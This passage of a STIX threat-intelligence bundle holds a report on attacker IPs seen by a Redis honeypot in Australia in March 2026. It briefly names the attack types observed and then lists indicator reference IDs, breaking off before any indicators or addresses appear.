{
  "id": "bundle--58e715f8-c943-4a22-a78c-d663ae24aac1",
  "objects": [
    {
      "created": "2026-03-01T00:25:15.012Z",
      "created_by_ref": "identity--ab072f15-9b87-4ee1-898f-b584d41f29b0",
      "description": "Rolling monthly view for March 2026 of IPv4 addresses observed by Redishoneypot on a T-Pot honeypot. Attacks targeting Redis port 6379 including replication-based RCE (SLAVEOF/REPLICAOF), config manipulation, module loading, and cron/SSH key injection. Each run looks back the last 1h and appends newly seen indicators for this month. Location: Australia.",
      "id": "report--58e715f8-c943-4a22-a78c-d663ae24aac1",
      "labels": [
        "threat-report"
      ],
      "modified": "2026-03-31T23:25:03.968Z",
      "name": "Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "object_refs": [
        "identity--ab072f15-9b87-4ee1-898f-b584d41f29b0",
        "indicator--33eca3b2-eb24-4320-9bfd-e4a0fb183b2a",
        "indicator--fe9a1f96-c8e3-40c1-add9-32b4402a1364",
        "indicator--d8033d56-3400-4084-82c2-cb3a14e7c79b",
        "indicator--e7e9c83e-ee56-410f-bf79-df4f29f2d504",
        "indicator--8c44e911-5b5c-4d03-9738-5dc04776a9ab",
        "indicator--f9e103c2-5494-4119-b8ea-5d54734e3d82",
        "indicator--aeb4bd7e-61b7-42fd-93eb-2dfa8cbdd503",
        "indicator--46c4e495-3987-40a3-88ea-3bcee0e632ac",
        "indicator--1de4305a-38f4-48a4-af7e-7b41dd16ffe4",
        "indicator--430f6b25-f6b1-4a64-bdc0-89c86d222464",
        "indicator--f274e4aa-2a7b-4d0e-8438-8ec3dbcb913d",
        "indicator--e0ae4e3f-b261-491b-b04e-91ea1a136bda",
        "indicator--59e82764-3c26-4632-9135-8213d9ade5fa",
        "indicator--2a382b6c-13d3-45ed-a704-0047641db63b",
        "indicator--3b225698-beec-494d-a568-591ffb15cf2a",
        "indicator--4590ed99-4db1-455c-9fd0-dc382f630311",
        "indicator--761576db-abd5-46b9-ab91-a594352149da",
        "indicator--1145077c-2517-4617-89f2-667b7d5a009e",
        "indicator--c9195e98-4b70-40bf-8e59-ce9eb4c5f8e1",
        "indicator--210433d7-83d1-4f33-af00-66b2da3511fd",
        "indicator--e98711eb-ad08-4e3b-a2d2-96696d1681f8",
        "indicator--59d3ae83-218a-4314-9574-c90a01b14925",
        "indicator--45b2375d-42f2-4585-904c-36c1d7e05efc",
        "indicator--8610047e-fb6d-4b81-9a69-c000ad285f1c",
        "indicator--fe665edc-a5b4-4f91-b386-214aa354bf5e",
        "indicator--cded6b0a-f596-47f4-bb89-8d1d9360182c",
        "indicator--05a37e5f-4bcc-4af7-86a9-97c77468bfd4",
        "indicator--14306f72-0d4a-43df-bb3d-59dbc1f9c042",
        "indicator--6343cf9e-51fd-44d1-aced-1057c3384ca4",
        "indicator--6a4cf02f-4f5c-42a7-a890-cbec26368e05",
        "indicator--a1c592bd-4461-442e-a00a-28af93636366",
        "indicator--6adbe385-e24f-4c68-9de1-14fa828dd28e",
        "indicator--8d7a1a5e-b176-4d88-b6b4-68bcfb7ef57b",
        "indicator--22b7c063-1c4a-4e37-94be-71f9902d2ef8",
        "indicator--90ed5a52-5611-4776-a41e-28c808d7bed2",
        "indicator--7ded0026-9eaf-4453-9508-6c18be924859",
        "indicator--0a70c5b6-4efb-4f65-b9c1-baea0615176a",
        "indicator--33a68e96-b0cd-441d-9b55-d16078327ebd",
        "indicator--9fbdb126-5fd5-4ccf-8776-6b8976979f3a",
        "indicator--b733cfe5-134d-4f4d-bfdc-836e4a675548",
        "indicator--ac5f78d9-486c-4555-a16a-a8cd1ea21568",
        "indicator--435044c7-f081-40d3-bea6-b886bfddf578",
        "indicator--9ace066e-964c-4f4e-bdc8-7f22f937ba67",
        "indicator--807d478b-66c3-4fc1-b7fe-ca164ea35f51",
        "indicator--84d50f47-1248-41b8-a4ca-0b48b1402f61",
        "indicator--59ba6205-4dfa-4873-a6fa-399c576b880b",
        "indicator--0c545b8c-ec8b-4051-abb3-e8cfb8dc81eb",
        "indicator--425d5f6b-cff6-43ca-a615-fb409c955544",
        "indicator--9243f9a2-9c69-4645-bb2e-80f5c669de02",
        "indicator--e482bcba-4809-4b02-97ab-175d683befe1",
        "indicator--e85c4b06-bf8d-404a-8ea8-2f07b823d4b9",
        "indicator--1a456dab-2fc6-46c4-b000-96f6fbff7118",
        "indicator--1f0d0881-3504-4527-b351-c8c7539220a8",
        "indicator--d596c357-a24d-449d-9474-3a195e2881d4",
        "indicator--46976204-a006-462a-ae61-8a4708adc5ef",
        "indicator--891b1970-f62e-488f-8a0f-03dd7f236d1c",
        "indicator--90e2652a-132b-48b2-a2a6-447d6f3278f5",
        "indicator--6a774260-42c8-45de-a2bd-ed00e4878fd7",
        "indicator--d73f0457-298f-4b4c-a8dc-06149a227316",
        "indicator--479700b0-061f-4dd5-b0b7-372c097a7c1e",
        "indicator--5e1e0133-977e-4692-8c5d-7e76402e0a84",
        "indicator--4649b435-48c3-486d-8d48-19f8afc8f5a4",
        "indicator--962a77f1-d1ae-4be7-b028-04bcc801c76d",
        "indicator--60e608f4-fe3e-4069-bcf2-df607a3f398d",
        "indicator--cb5c7e53-f8f0-436d-9d81-80427400823d",
        "indicator--f450d3a4-b6a0-461d-9b9f-6902b1ca613f",
        "indicator--b8f229b7-6a23-4633-911b-a820b145bf0a",
        "indicator--1638aade-2a1b-4ebe-af20-d0e5d1a3c1fe",
        "indicator--b2cadc4b-781d-43e2-8e47-a44710162b35",
        "indicator--9c822a0a-3bc4-42ce-83fd-887b73999867",
        "indicator--ea74e312-b9ec-495b-aab9-248fe350e48b",
        "indicator--cbae1715-03f1-4b03-9c28-42ca1b21b690",
        "indicator--3296db63-ee92-429d-90a4-d21591eddbff",
        "indicator--4a9041e0-3a44-476a-8370-2a323523bea3",
        "indicator--66850bf9-1b07-43d0-95e4-75db418202ce",
        "indicator--0f72f59a-206e-4895-b55f-9a8eb4fc765b",
        "indicator--334bd556-c1cf-4999-bb41-2e6c4b7d0404",
        "indicator--a3efab27-f3cc-4949-92cc-8034b8d756ec",
        "indicator--c227d013-9a30-4c31-a7fe-8f274484d2dd",
        "indicator--076a4376-e176-478f-b857-3a1ba0359bdd",
        "indicator--5b1ed4aa-c0a7-419e-a2c5-f6b206da1763",
        "indicator--19f1ddd7-1d03-4e27-80df-9b88e47bd397",
        "indicator--7d9fb1f9-5917-42d8-849b-c1ed5beb15b4",
        "indicator--6737886a-c59d-4d19-ad2d-14abafe16f71",
        "indicator--273b5505-d7b0-4399-8f25-aed1b8535bf7",
        "indicator--08caf8e0-4e2f-4d47-a735-b92afa9c4b87",
        "indicator--f2ec1bda-ad99-4911-ab8e-5f7c38216e0b",
        "indicator--ec3df7e5-e660-4c6e-9a60-60d7ee8ac11d",
        "indicator--9cc8bcba-044e-4c05-9933-db6454794cf0",
        "indicator--7934b6c9-1b9c-4ab9-9bef-ce89d93c003c",
        "indicator--1d998557-9c22-4151-af5a-ec9038b56068",
        "indicator--df87ef89-89ea-4a0c-ab73-1b5510360559",
        "indicator--8a1f3516-c407-47cc-83fb-3cc2f975bb09",
        "indicator--b73c0d4d-cddf-406e-ac87-edfd391f6db1",
        "indicator--5ad5591e-b359-4fc5-b8c0-03eaf258a9ea",
        "indicator--576ada6c-171e-4a69-867b-221128e6d11d",
        "indicator--898b1dff-54c8-4b7e-bd7a-2ca9e86b7e47",
        "indicator--4c8fca13-3e87-4484-aa9a-6de69b5bd090",
        "indicator--ec3848fb-75c9-45cd-9026-d02348362b61",
        "indicator--5aedd17a-a513-4c84-94c0-a553cbff61ca",
        "indicator--3a7b15d0-45e9-47bb-b88b-2418519e7d09",
        "indicator--319cf0ed-9adb-4c9f-9624-7d2cea07e0e3",
        "indicator--f37c7241-c366-4e6e-abd6-b9f5bae15b04",
        "indicator--93462efe-f011-48c5-ba0c-f26f3ffbcdfc",
        "indicator--ea2bbb3a-8b49-4146-a010-87620c8414a6",
        "indicator--4d97ca37-f7d3-4d20-b748-965ca93f3ba3",
        "indicator--c390beb6-0e6a-4ba5-9a2f-6dc10bda804a",
        "indicator--b0efaae3-de8a-4427-ac24-07517bf9df9a",
        "indicator--7be7a30c-6b56-4893-b8d5-9b7585b4c235",
        "indicator--762dc765-7b7a-4901-968d-f828e6b4ef3c",
        "indicator--5f3068e6-512a-4e38-905d-a499a4f59c98",
        "indicator--ba15b796-fa83-45d0-9195-7f65692c7dbc",
        "indicator--c03ac74d-6b04-4b18-b64d-0b092b410437",
        "indicator--0afb90bd-d805-4142-88d5-266f6567810d",
        "indicator--c7a3fedd-5a4c-4958-b42f-ca85be8f21f6",
        "indicator--c149f0be-6992-4410-af33-9742f1fef544",
        "indicator--084294b8-47b2-4a8e-a719-a86d692588be",
        "indicator--138281f1-d114-436a-b568-de8c046a4ad3",
        "indicator--665227c3-c470-4302-8029-f8007b6f0752",
        "indicator--27f8887f-3c48-4e2b-8be7-83983c6d4ca1",
        "indicator--e84caf7a-5abf-43ed-9b29-1a5159bcfdc0",
        "indicator--e52f12ce-e95f-403f-bcf7-9b3db2211858",
        "indicator--d24c39a4-52c4-4960-9fb0-de575ffc38ea",
        "indicator--729a819c-9b83-44ac-95f9-d8ee6b66e6f1",
        "indicator--ca87acee-bbfa-4deb-bfe8-e8ace6cf58b6",
        "indicator--615cba90-b5cc-4837-bb8c-2feb9627d252",
        "indicator--30cb16a0-217b-4c34-9aae-7f5c489570e9",
        "indicator--8face18b-074f-4c6c-9320-e0586389cfec",
        "indicator--d21a10a0-c9e3-478d-9f96-1a35fe9552ac",
        "indicator--77fec30b-04fb-4400-87c5-dc9f9e8a906a",
        "indicator--ea3d5a36-ba3b-431d-9037-6fe5e87d2d94",
        "indicator--13e2a003-4826-4539-af64-5aa1dd214f18",
        "indicator--b7fa5d27-9bb2-443b-8a85-1777b2dd8e9e",
        "indicator--a7a04ed8-9187-4fb9-a5ac-f77e27d4bff3",
        "indicator--ae186e39-9c43-4e07-8576-2c79afea315c",
        "indicator--8ffea8cd-b594-4410-9708-2fa5dcdc61c6",
        "indicator--45e3ff64-19c4-4d1a-a474-8097cbabf8fa",
        "indicator--923e630e-83ac-408c-a78e-0ab8969af41a",
        "indicator--d7e4ed83-6b2f-48d3-a294-0e5c7f644613",
        "indicator--c7d75049-12e5-439b-b406-0934f2125144",
        "indicator--7015d63d-2ed8-4d24-aea9-72d305aa44d2",
        "indicator--e97b1d7e-417f-45a5-9e0c-30137ffe8288",
        "indicator--17278fc2-3848-44a7-b272-635353b80321",
        "indicator--2072fd31-a642-41a9-a3cc-2e7d1a32fd3d",
        "indicator--8e65190c-eae2-45f1-a97e-b1f8b34160e5",
        "indicator--34d2f6fc-0f4f-491d-ad26-aaa74c3eedfa",
        "indicator--ffafaa18-14bd-4c40-a135-08974301211b",
        "indicator--333a1926-ef3c-48b9-a5da-08d3a999f1dc",
        "indicator--117950da-2848-4f32-885c-5730176e9b0c",
        "indicator--30d1c40c-a3be-42ce-808b-f7fd506db4bf",
        "indicator--1a3c6d6e-c3a5-458a-9e2e-9d9faa8f9e50",
        "indicator--bd6eaedd-af93-4a40-a777-3a8d266e1b54",
        "indicator--18c12c1d-4be3-4c3e-8f7c-15bbe5a1df40",
        "indicator--a85f56bc-9f62-4a98-8bbf-354ee47fd287",
        "indicator--dddf4205-b141-49e0-9906-17015631f8e2",
        "indicator--aa9f3e46-0fad-4700-8f09-1fa26286f70b",
        "indicator--81babd64-255e-4b08-b279-d89a3fa1c1df",
        "indicator--36fe0be9-5332-4c6c-af98-71fbd66a8816",
        "indicator--61db714a-fe1c-47ce-8ccc-8f439477f1c7",
        "indicator--cd0035a7-cc3a-4e64-bfe7-94ffb3c8faa1",
        "indicator--22bedab2-8535-413a-b657-36d9185483b5",
        "indicator--389cd20d-d09a-44ed-8676-5e508096628e",
        "indicator--6b50ac41-bf35-4079-aeff-a67068a107bf",
        "indicator--8f27e124-add1-4d65-b0d3-69adae7369f8",
        "indicator--5dbe1268-4f10-4bcd-aa4f-ea2a6a33e027",
        "indicator--51d9ebf3-56fc-42aa-9e17-1301673254e2",
        "indicator--fb4ad074-e7ef-417e-9bef-c9c9ce75b755",
        "indicator--04fda896-e167-44b0-b209-1200623a9270",
        "indicator--c7e96d16-cee6-4ab1-8096-06e9e4477f16",
        "indicator--70dd392f-831b-4460-be07-4f4baf927266",
        "indicator--1484447e-f44d-4929-9be6-b0c37c5ea7b0",
        "indicator--506fda16-4386-444b-87a1-32533aee0f29",
        "indicator--78b56f41-796b-4072-a80c-4180a9aa4236",
        "indicator--811359b6-ae27-4843-9545-88d9a92dcb29",
        "indicator--7bf855b2-2c0f-4087-9891-5b8464f4f553",
        "indicator--3aefed46-f5c1-4d75-a2e4-fd9be341e368",
        "indicator--221c2636-d37a-4ec1-a6c0-678c58f6dcf5",
        "indicator--3dcf5d48-0f64-411c-8f16-371d0dbbd0c1",
        "indicator--59085736-d867-43f6-bf97-0f1cf25a28af",
        "indicator--cb68f15f-b216-4df7-b27f-3f7ff0eb6176",
        "indicator--18b133d8-34b1-4a1b-a219-342246c8ef38",
        "indicator--64dffaf1-4a1a-4c00-be3e-b835d0f95302",
        "indicator--c86b86f3-f650-40de-bc61-e7d8b0055c80",
        "indicator--0b8d288d-f2cd-47ea-9bb2-d54f9ce255f0",
        "indicator--5bb1fa9b-ccf6-4641-86ad-f2d32271bfda",
        "indicator--45b54eef-0563-47cd-a18d-9982613cf8c7",
        "indicator--a15b0204-6127-4617-af39-bb90f99b2240",
        "indicator--6face142-5525-47fe-9bfc-ce797db0f2cc",
        "indicator--237bf5a8-168b-4b3a-8167-7f81f8df985a",
        "indicator--b93eb85e-7f1e-4987-8e74-9a7eefb133db",
        "indicator--11b4b616-7663-4480-95d1-aaaeba7b95aa",
        "indicator--8c2f98c3-7080-41cb-8fc4-3f6002181d03",
        "indicator--e3c985a3-03ca-4a47-8cea-e62d0ea9570f",
        "indicator--acc3be54-69ff-49eb-88b8-77d09f76aa46",
        "indicator--0c1c19a3-f254-4bc4-8c1d-259a992af4eb",
        "indicator--6adb11bb-ff88-4a9c-a46a-4752fc84d77b",
        "indicator--2a7c4707-a0ef-454f-ba7e-3bc9e7cec03e",
        "indicator--b1b347e4-9545-4048-8c6b-b2c7b1ea80ef",
        "indicator--c208ca69-55a7-4b01-b763-0b429dbbb566",
        "indicator--be65d27e-8e1a-47a1-96e7-606d03b1b3a7",
        "indicator--4ea05228-b316-4d56-a5d0-cffdabc7438c",
        "indicator--d1085c4e-92ec-45bc-a779-092086132fff",
        "indicator--e7769577-1cd6-49f7-9adb-58dbd9655746",
        "indicator--4fb2ff2c-681a-44c9-af70-3c461fac67b0",
        "indicator--f0a59a58-14d8-4e89-8617-5c954ce0d2f5",
        "indicator--c6b92cc8-ba57-45bf-a573-7358979b42a5",
        "indicator--3622bf7a-34dc-4e00-a984-29f5f1741edf",
        "indicator--d3131355-38d1-4b7f-bced-78ebf9da1736",
        "indicator--36067313-f90a-4c1d-a086-fe6d0f7da935",
        "indicator--cee8f52e-1e2b-49ef-b1dd-2a2011b9e409",
        "indicator--ef8d6a9c-e5fc-4899-9c74-27aa24c80c34",
        "indicator--f0a798a3-f65d-41ac-b03c-d5f2799479a7",
        "indicator--a5c936ef-a875-401c-8889-93cfccf2a064",
        "indicator--f7de5590-5a60-48cf-be37-b5d15bf648d1",
        "indicator--517fdf8f-327c-48ba-90c2-2992bd4f9a2c",
        "indicator--60da2ccf-5ef2-4d2c-bf88-a40d19ac1fad",
        "indicator--aa97df55-3016-4c75-92ca-ea39aa773865",
        "indicator--96b96327-5f6a-4a0b-80e8-b32bb0877c49",
        "indicator--aab783ee-ba73-4566-9e3e-7a4a197f3536",
        "indicator--4e46b47b-f645-4049-b265-e1b472786020",
        "indicator--91d6db15-30de-4f83-98b3-b097e39d325f",
        "indicator--64b2f1b0-67e8-468e-803a-07c4794c57fb",
        "indicator--2c63eeb0-a193-4caf-951e-0acb22f87726",
        "indicator--bd0d852f-8de9-4372-9fd4-6d4e0bf346ab",
        "indicator--ccaab14e-acaf-4ea1-8d97-30e5e33623f9",
        "indicator--7a86fc75-9915-4413-91b1-37a0f0471fcc",
        "indicator--9a5b5266-42f2-42df-aa87-5bd5697a2b59",
        "indicator--066d8b20-a22f-4980-af33-8590b0fdf2b1",
        "indicator--5abdb8f6-66f2-4ca7-8d1f-a6c0ae7590a6",
        "indicator--7a451679-7459-4e82-b526-bdbb30c402e1",
        "indicator--bd5a6661-b4e7-4172-9d35-1c74b4244c98",
        "indicator--56fc546b-4526-458a-91a9-95e6f86210d5",
        "indicator--61e0b349-01bc-4cae-9b59-bcfc1742c265",
        "indicator--e701ab2b-a464-4cf2-85c6-154c3d7464a7",
        "indicator--661de8ec-aa71-4d9a-983d-b21e4a0f236f",
        "indicator--82b4cdd9-95f5-459d-9dcc-1a5dc6c334dd",
        "indicator--cc32bb7f-a02f-47ff-8a99-805e3d657f5d",
        "indicator--5febb641-d692-445b-be9e-1422164bcd1a",
        "indicator--b94efbc7-6b1c-4fd3-b0ac-6fdad0f0d5fd",
        "indicator--ab957f89-acec-4f34-9e0e-df7516aace68",
        "indicator--04a8387f-61ea-48d8-974f-b9dd09f40661",
        "indicator--4f7ef6b7-9f1b-41e9-b948-106781f90dab",
        "indicator--e9ab10c0-a3c5-4e64-bd9e-7cbaf071ea44",
        "indicator--5184b425-94b6-4d16-921b-985eab2364ee",
        "indicator--80633887-0ef6-46c7-acbd-b3337b80a45e",
        "indicator--1ddc5881-668a-4336-8df6-2c65dcbe44c0",
        "indicator--cc8cddd3-be24-4e32-995f-b0d68677339e",
        "indicator--e9846527-83bc-435a-8ca1-0c5af823b0fb",
        "indicator--53afeb5c-80b9-4a0f-b821-720942feb2c1",
        "indicator--1351e28d-90c1-4d3b-9013-98c90792cd0b",
        "indicator--4da1ccc1-6ada-4cf0-9f9b-c04c2039dc8f",
        "indicator--fc83747f-16e6-4a00-be8d-5a9c07e8f3ed",
        "indicator--a78b4394-5043-4446-84cd-93de69e5053b",
        "indicator--89e28b64-6bdc-496f-8fc0-43b636d1d6c9",
        "indicator--4ed52c71-ebcb-48de-b41f-b996ff81f4fb",
        "indicator--cf82854e-2249-47a8-b743-7f218df0a105",
        "indicator--7a58d934-ad32-4697-b07d-ceda43c25226",
        "indicator--72c7f504-ebf5-4283-8cfc-40ec47ca5da6",
        "indicator--7d789f6c-f1e0-49b6-80a2-018b39900f22",
        "indicator--a68ba487-2542-45f7-a000-33e5b76e4fbe",
        "indicator--6ee4fc8c-2cfb-4fc8-9559-650a496cb91e",
        "indicator--e4731af6-be8c-4b94-94c7-bc96ec42e51e",
        "indicator--26c8844a-27e6-408f-bb09-f0b3f3725be2",
        "indicator--dfa15b68-332d-43d1-a07e-59f2180d97b9",
        "indicator--e8848e25-7800-43de-aff6-217b859228f2",
        "indicator--e6660cee-766e-4358-9816-e16658b1ff52",
        "indicator--aa49eaa6-f158-47e5-980b-74957f135efb",
        "indicator--0ef48a76-5771-4d83-832a-c3ac9464f84c",
        "indicator--56b7b4ba-f5c2-45cc-8f1c-957ea03a6816",
        "indicator--985e519a-5be4-4b98-a910-9d05b991a226",
        "indicator--726f9f23-61ac-4cc4-ae63-aa9b5bc8f002",
        "indicator--355b72bf-26be-48c3-a722-5b0c0349ff89",
        "indicator--c3142f83-ccae-4f0a-95a9-a946df50a7ab",
        "indicator--565e559c-5135-46e3-9adb-2d5e626383ce",
        "indicator--e7b6c64f-5775-4151-9835-87cede4c9fe8",
        "indicator--3dc5a291-1e5c-4f24-b369-c3534a422583",
        "indicator--f0912112-b13a-4795-93f0-3949ae5c98e8",
        "indicator--d806a66e-799a-48e8-9462-888c98f391da",
        "indicator--e0cee174-a471-4440-a832-52374f832c26",
        "indicator--b8ce32ac-dfec-49eb-a4d6-1c075f786ffe",
        "indicator--c18c31b9-8ba1-42f8-b76c-6b56134060f5",
        "indicator--7a146bf6-c6e9-4c0d-991a-070c1bf4edf6",
        "indicator--1e3d2809-bd88-44bd-943e-2d5b020a4868",
        "indicator--8251aaa9-304a-4fd2-a24b-ee887cc449af",
        "indicator--290620fd-4dbe-47e5-8341-2682d79e58d8",
        "indicator--21e6f3cd-84af-4861-be6b-e490bd51ae2f",
        "indicator--6357eb1f-f8f7-40ec-b2a9-c678f0745d48",
        "indicator--3fe1e23e-98b5-4379-be5b-d1688d41aa86",
        "indicator--816e1a3e-4401-440b-a489-d8ec983b24b1",
        "indicator--08fa34a2-f183-406c-b5c2-576706fb2be2",
        "indicator--338dd345-45be-4bb3-a768-e56478f6de28",
        "indicator--f8956b90-5815-4dab-92c1-838d4ba79c00",
        "indicator--0d72c8c6-ef19-466d-838f-25f1397f5ef1",
        "indicator--a988514a-c4e0-46a9-a019-54119250e1df",
        "indicator--b8690fcd-f7c1-48c8-a266-2ea0bea70d6b",
        "indicator--0a6c8b19-290f-47da-9760-f1552be5820b",
        "indicator--d5ce8771-117a-4e93-8181-944c5f3e0d0d",
        "indicator--8d93facd-5669-44a3-b33d-a28df3ab296e",
        "indicator--ab54878f-4ef8-4fa2-8fdb-957b36d4cb2f",
        "indicator--8e2e98c6-5888-4fc9-ae89-7cd66f868578",
        "indicator--84d05e4b-fcce-4969-a37f-cd740a3c78cc",
        "indicator--ab750f58-4e81-40c3-b3dd-3e3826b7b071",
        "indicator--e5bea4fa-d8dd-4b68-a473-dceba64d0142",
        "indicator--1514517a-c85f-459f-a695-c1397c600b33",
        "indicator--9defc4ad-c2fe-4bf4-9b48-879737233edf",
        "indicator--d3aa3816-d116-4d72-8023-c5e8484c8c8f",
        "indicator--5b0f8354-330f-4077-a2bc-10a2700d2832",
        "indicator--b5ef6c2c-ae78-4a03-bf7e-cc38edc18989",
        "indicator--acf5888d-3e2b-4325-a02b-8f5787d9e3b5",
        "indicator--50e95393-3cb8-4395-bef7-1a6c82bdd07b",
        "indicator--4f837022-c40d-49a1-b2cb-649628bf3c0f",
        "indicator--c374350b-2780-4e9f-aadb-3d4434c04b44",
        "indicator--c4e1347f-fbc7-456b-ab4d-11bee6e6b5ef",
        "indicator--76ebcfe7-314b-4700-879a-db8caf635b6a",
        "indicator--dffb087c-385c-450d-8c91-fd246af58701",
        "indicator--31723584-f829-40a9-ad57-8bde67bc63be",
        "indicator--97eee190-c81f-41f2-b9cd-6f658c6c5123",
        "indicator--dd49ac26-b46a-4f8e-89de-b6c19045e73e",
        "indicator--8e04a428-3918-4c1e-8453-cb0474904c20",
        "indicator--19294839-46ae-4362-a12e-44277ec9470d",
        "indicator--8f155738-3760-40b0-9dd4-82781b3b084e",
        "indicator--a544a7b2-ee0b-4afa-b9b0-23a08673a089",
        "indicator--5ee36acd-4492-4b81-af8f-a7b19bbef225",
        "indicator--f465b2cd-8f22-46f2-869a-ff125a4cc6c8",
        "indicator--c73aea9c-c112-42e7-b547-b4603a447637",
        "indicator--8e8cb263-8809-4b38-88ea-f2d8868b6d02",
        "indicator--f535580a-27f8-4929-9afe-85beec02ec7d",
        "indicator--86e892f1-3380-40f2-baa3-70d7cb83a292",
        "indicator--02ddc4c4-3302-457f-ad6f-f0b1853aeecc",
        "indicator--f34d51e1-b528-40dd-9892-127eaf3d1b78",
        "indicator--feb69c43-abe1-422e-b806-4d45682cc6e2",
        "indicator--afbb2818-1215-4df4-bc60-2174992cc157",
        "indicator--d8199bd6-a6b0-426b-a22c-4608a411abe7",
        "indicator--fd4cfe9b-30d5-414d-8904-0ff494ec4118",
        "indicator--12d1c3e8-db8e-41c6-93bc-11a76dfddc10",
        "indicator--41eff508-cf9f-46cb-9dc7-999c952d0089",
        "indicator--95e132dc-a777-46da-bfb1-662341a5408b",
        "indicator--2239211a-7507-478f-8d8a-a01b68fa042e",
        "indicator--53671e33-00af-46b9-81c5-01a3149e20a2",
        "indicator--99709ffd-100d-45e3-becb-170aef59b4eb",
        "indicator--9013458c-43e2-4e43-b785-56d2893c6358",
        "indicator--ff346367-43fd-43b0-8ffc-8a9670db50d2",
        "indicator--dcbef8fd-c501-4465-865f-3c0640147821",
        "indicator--222b789f-5221-42d7-aae6-f9bddf759b45",
        "indicator--6405c67e-e6e3-49fa-9815-7bd2b4d9196b",
        "indicator--a5f692e9-7e12-4bbb-bdcb-ee2d3de65af7",
        "indicator--cecff700-cfbc-450a-a42c-753e508f1969",
        "indicator--5e183ff9-f150-4c91-b712-ab23ece16752",
        "indicator--c8d7f83e-5f8d-42ba-99ed-cdb3b5ded5c8",
        "indicator--a77c1360-0aef-4a92-a9a9-b1d494c9aa29",
        "indicator--2c3cea6d-6503-4ff1-85ff-488686df59e9",
        "indicator--6cd88b5e-3a84-4d7b-9c9b-cbe312f43ac8",
        "indicator--f5031ef2-314f-4caf-ad26-021337519975",
        "indicator--11abe87f-c477-4712-a4be-d553ead45ef6",
        "indicator--98337031-14c1-4462-b635-f1bfd65869ce",
        "indicator--980ed310-bda1-4409-b2e5-f934b69c249d",
        "indicator--9d6cf131-4740-4c60-9093-3bc535cece8f",
        "indicator--1222a6ab-64a3-4976-a638-8f0349c721e4",
        "indicator--06b43a84-1aed-4ef4-a12b-247d175d39b6",
        "indicator--d65606a4-f7ad-4723-9704-9ce35dac52d7",
        "indicator--621b62ce-dd56-45ac-9ab7-6cf1b62ba9dd",
        "indicator--46ac4091-cf2b-4927-8272-6d9d1cd72dee",
        "indicator--96e30487-9b43-46bb-8b55-5b38c98eb72b",
        "indicator--cb348a88-6b4b-475e-a631-179799e22e80",
        "indicator--aff31cb7-4482-47a9-9108-26cd413ba384",
        "indicator--aa08b597-1a22-470c-add8-a70c9da75b7c",
        "indicator--9b77b954-e2bd-4176-b82e-3c892a40cec3",
        "indicator--dcf8e454-c632-4d4a-87c1-9c45fb58b5a8",
        "indicator--0d752244-fe14-4c26-8467-45898549ed18",
        "indicator--52fe56b4-1f4e-4aec-b4d7-bd090c4ffd24",
        "indicator--3ecf3be4-ea66-43ce-b69c-027fae9f1253",
        "indicator--b559794f-b0c3-4128-8575-2f20facaeca0",
        "indicator--8092a581-171f-4d50-8eb1-2d915be29712",
        "indicator--a73a6e5a-fa71-4cbf-b9fb-f1f3655f85ca",
        "indicator--69a73c4b-4549-497e-9d9a-8ddebcb237b9",
        "indicator--5d01e53d-7373-47f0-8506-15a26cbb63e5",
        "indicator--2d76394d-c1e9-4470-81da-e4731807c769",
        "indicator--79c9cd12-b405-4448-aa3a-76a12bca6db7",
        "indicator--383dd47d-d211-4331-bb08-ed95c31009ed",
        "indicator--f6354fd4-e0f2-4947-b04f-0897852193bb",
        "indicator--9410b97b-c2ae-48cd-a4c1-200f16e75495",
        "indicator--db24f1c1-c184-488d-b0b4-9ac61d3cef70",
        "indicator--5dd65821-28c3-49d7-8a7c-dc216f273d4c",
        "indicator--6d05db9a-5d64-433c-8261-2dff38a56b42",
        "indicator--45f18fea-60e6-4248-9aea-b584b4816319",
        "indicator--2a6fd002-417c-4566-9ec3-b70e2f8ea1f5",
        "indicator--7aa5a21a-4f63-48b0-84e0-9b056d368c08",
        "indicator--0a03e6fb-f243-423e-9825-439dd6a26d1e",
        "indicator--a99da0d4-a0a7-403b-8b53-a90d1418e7e8",
        "indicator--c3ff5785-d9f8-4880-8b65-cc12d1a74dbb",
        "indicator--da75c319-53a5-4cb0-a26b-d252e5cdfd8f",
        "indicator--4fc4c0b5-6540-4094-936f-fa19fc991766",
        "indicator--8ecfb946-c3e6-4ea8-87b7-282303ffd89d",
        "indicator--da3c468d-9414-4041-832c-644046671471",
        "indicator--79241d90-9a2d-4a53-bab8-43016e51a699",
        "indicator--5d9f34a8-c784-489d-9695-7de1b4f02102",
        "indicator--340dbe36-1893-4495-9fd2-8fd0f54f2f3a",
        "indicator--34d348a9-f71e-4ec7-80f9-9290795f668d",
        "indicator--e72de6a4-0274-48b8-bd21-07caa3addfb1",
        "indicator--d5c3bcd7-f81e-4d29-91e1-414829f0e695",
        "indicator--decb4b56-82aa-4068-9dc5-b82f725bd731",
        "indicator--a0709b5b-3ef5-4432-a729-5b9f6f18157a",
        "indicator--3338227e-095c-4a91-a1f1-2a280a692126",
        "indicator--de96fee9-a8eb-4d0e-a4d8-78f07827ae4e",
        "indicator--0d6b46d3-ab07-469c-aee8-0ac358e1bdca",
        "indicator--c0b0560d-f9f3-4469-84c1-ec8b93e8902e",
        "indicator--0ee4c896-6167-4e9d-8217-71f068b38751",
        "indicator--33dbcfaf-b556-4c44-9734-cebaa01ce931",
        "indicator--7d56687f-fcd8-49ab-9237-9dce1d59e924",
        "indicator--66697fa3-2bd4-4c89-9194-1c00c673187b",
        "indicator--a4a4535e-5c46-4324-875b-d98b6205f85e",
        "indicator--7b77918e-d1ad-4580-9d3a-f56f42fed41e",
        "indicator--87b729c3-0a16-478c-ae71-20a776fe9acb",
        "indicator--a42f2a43-b41a-4f51-a680-5a4e08dc1cba",
        "indicator--bbf73bfc-4cfc-406b-a88d-596f5a1f5950",
        "indicator--a7579195-3579-4311-8019-3eb52dc49ad6",
        "indicator--fd737788-346d-4b15-b716-552b695a1e62",
        "indicator--a4c16a2b-639e-4bcb-aa07-8a26bd381e64",
        "indicator--7d9dba6b-cbcf-48a2-a454-785277d3d108",
        "indicator--2f838d4a-df87-42a0-9778-aeef9494660a",
        "indicator--a616f47c-eaff-4044-98c9-bb8051f3c65b",
        "indicator--8d89375e-3783-4de3-9cfb-2d4b4e1f0d64",
        "indicator--53ceda40-7c60-4082-8581-52a71c25cecc",
        "indicator--cb5c86cc-71b1-473c-bd31-df0ccd806634",
        "indicator--f11c2c43-e7bc-4c18-b937-3309a1490a89",
        "indicator--690f1e5e-43cc-4f70-a188-f7843dcaf44b",
        "indicator--0c3eead4-8f85-4c47-b954-d70ae6e1d0e9",
